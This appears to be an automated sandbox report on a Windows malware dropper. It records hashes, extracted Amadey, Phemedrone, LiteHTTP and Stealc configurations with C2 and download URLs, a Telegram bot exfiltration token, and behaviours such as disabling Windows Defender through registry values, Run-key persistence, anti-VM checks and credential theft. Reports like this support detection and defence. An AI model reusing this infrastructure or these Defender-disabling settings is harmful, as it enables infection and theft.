Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 17:05
Static task
static1
Behavioral task
behavioral1
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win10v2004-20250217-en
General
-
Target
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
-
Size
938KB
-
MD5
49b60f16af6a6028755c86cad74bb4ee
-
SHA1
a94d538bebbbcf138c9116f5201009ae14d9c773
-
SHA256
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67
-
SHA512
dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
phemedrone
https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/1520-665-0x0000000000A60000-0x0000000000ECC000-memory.dmp healer behavioral1/memory/1520-666-0x0000000000A60000-0x0000000000ECC000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" a08064d4d7.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a08064d4d7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a08064d4d7.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a08064d4d7.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" a08064d4d7.exe -
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cc9ac2900b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c1c4c6ac25.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a08064d4d7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d7fb9061a7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9bdac42c90.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0587d4f94b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60e13ce159.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7cb8f1b366.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2900 powershell.exe 8 1952 powershell.exe 9 3048 powershell.exe -
pid Process 2276 powershell.exe 2544 powershell.exe 1284 powershell.exe 2784 powershell.exe 2900 powershell.exe 1952 powershell.exe 3048 powershell.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 21 1188 BitLockerToGo.exe 28 2652 BitLockerToGo.exe 154 2932 rapes.exe 150 2888 ce4pMzk.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 7 2932 rapes.exe 4 2900 powershell.exe 8 1952 powershell.exe 9 3048 powershell.exe 146 2932 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000700000001a4c1-822.dat net_reactor behavioral1/memory/3432-830-0x0000000001150000-0x00000000011B0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cc9ac2900b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cc9ac2900b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0587d4f94b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60e13ce159.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c1c4c6ac25.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9bdac42c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9bdac42c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c1c4c6ac25.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7cb8f1b366.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a08064d4d7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d7fb9061a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60e13ce159.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a08064d4d7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d7fb9061a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0587d4f94b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7cb8f1b366.exe -
Executes dropped EXE 30 IoCs
pid Process 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 2932 rapes.exe 2576 2c6cf18ecd.exe 1356 TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE 2604 483d2fa8a0d53818306efeb32d3.exe 548 d7fb9061a7.exe 1908 pDZWk1j.exe 1880 pDZWk1j.exe 1712 SwffjsQHJy.exe 1996 ihu1EZOyUL.exe 2736 cc9ac2900b.exe 1048 c8386e5aaa.exe 840 c8386e5aaa.exe 916 9bdac42c90.exe 1832 0587d4f94b.exe 2636 60e13ce159.exe 2888 ce4pMzk.exe 1564 c1c4c6ac25.exe 2160 7cb8f1b366.exe 1832 b35c8a7182.exe 1520 a08064d4d7.exe 3384 joblam.exe 3504 pDZWk1j.exe 3564 pDZWk1j.exe 3572 pDZWk1j.exe 3704 Sisa9ZqkDf.exe 3720 fHR07lEtsm.exe 3124 mzwkecO.exe 3432 mAtJWNv.exe 1672 mAtJWNv.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine d7fb9061a7.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 60e13ce159.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine c1c4c6ac25.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 7cb8f1b366.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine a08064d4d7.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine cc9ac2900b.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 9bdac42c90.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine 0587d4f94b.exe -
Loads dropped DLL 64 IoCs
pid Process 2900 powershell.exe 2900 powershell.exe 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 2932 rapes.exe 1952 powershell.exe 1952 powershell.exe 3048 powershell.exe 3048 powershell.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 1832 WerFault.exe 1832 WerFault.exe 1832 WerFault.exe 1908 pDZWk1j.exe 1564 WerFault.exe 1564 WerFault.exe 1564 WerFault.exe 1880 pDZWk1j.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 1048 c8386e5aaa.exe 2412 WerFault.exe 2412 WerFault.exe 2412 WerFault.exe 2412 WerFault.exe 2412 WerFault.exe 1592 WerFault.exe 1592 WerFault.exe 1592 WerFault.exe 1592 WerFault.exe 1592 WerFault.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 1188 BitLockerToGo.exe 2932 rapes.exe 2932 rapes.exe 3060 WerFault.exe 3060 WerFault.exe 3060 WerFault.exe 2932 rapes.exe 2932 rapes.exe 2652 BitLockerToGo.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 2932 rapes.exe 3504 pDZWk1j.exe 3504 pDZWk1j.exe 3636 WerFault.exe 3636 WerFault.exe 3636 WerFault.exe 3572 pDZWk1j.exe 2888 ce4pMzk.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features a08064d4d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a08064d4d7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\c1c4c6ac25.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104920101\\c1c4c6ac25.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\7cb8f1b366.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104930101\\7cb8f1b366.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\yV9ypTrU\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\b35c8a7182.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104940101\\b35c8a7182.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\a08064d4d7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104950101\\a08064d4d7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\2c6cf18ecd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\2c6cf18ecd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001920f-38.dat autoit_exe behavioral1/files/0x000500000001a486-491.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1084 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 2932 rapes.exe 1356 TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE 2604 483d2fa8a0d53818306efeb32d3.exe 548 d7fb9061a7.exe 2736 cc9ac2900b.exe 916 9bdac42c90.exe 1832 0587d4f94b.exe 2636 60e13ce159.exe 1564 c1c4c6ac25.exe 2160 7cb8f1b366.exe 1520 a08064d4d7.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1908 set thread context of 1880 1908 pDZWk1j.exe 67 PID 1048 set thread context of 840 1048 c8386e5aaa.exe 74 PID 2736 set thread context of 1188 2736 cc9ac2900b.exe 77 PID 916 set thread context of 2652 916 9bdac42c90.exe 81 PID 3504 set thread context of 3572 3504 pDZWk1j.exe 117 PID 3432 set thread context of 1672 3432 mAtJWNv.exe 124 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 1832 548 WerFault.exe 62 1564 1908 WerFault.exe 63 2412 1048 WerFault.exe 73 1592 840 WerFault.exe 74 3060 1564 WerFault.exe 86 3636 3504 WerFault.exe 114 3108 3432 WerFault.exe 123 -
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b35c8a7182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b35c8a7182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a08064d4d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc9ac2900b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8386e5aaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c6cf18ecd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1c4c6ac25.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7cb8f1b366.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8386e5aaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d7fb9061a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9bdac42c90.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 60e13ce159.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b35c8a7182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0587d4f94b.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1808 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2740 taskkill.exe 580 taskkill.exe 1880 taskkill.exe 1908 taskkill.exe 2700 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 0587d4f94b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 0587d4f94b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb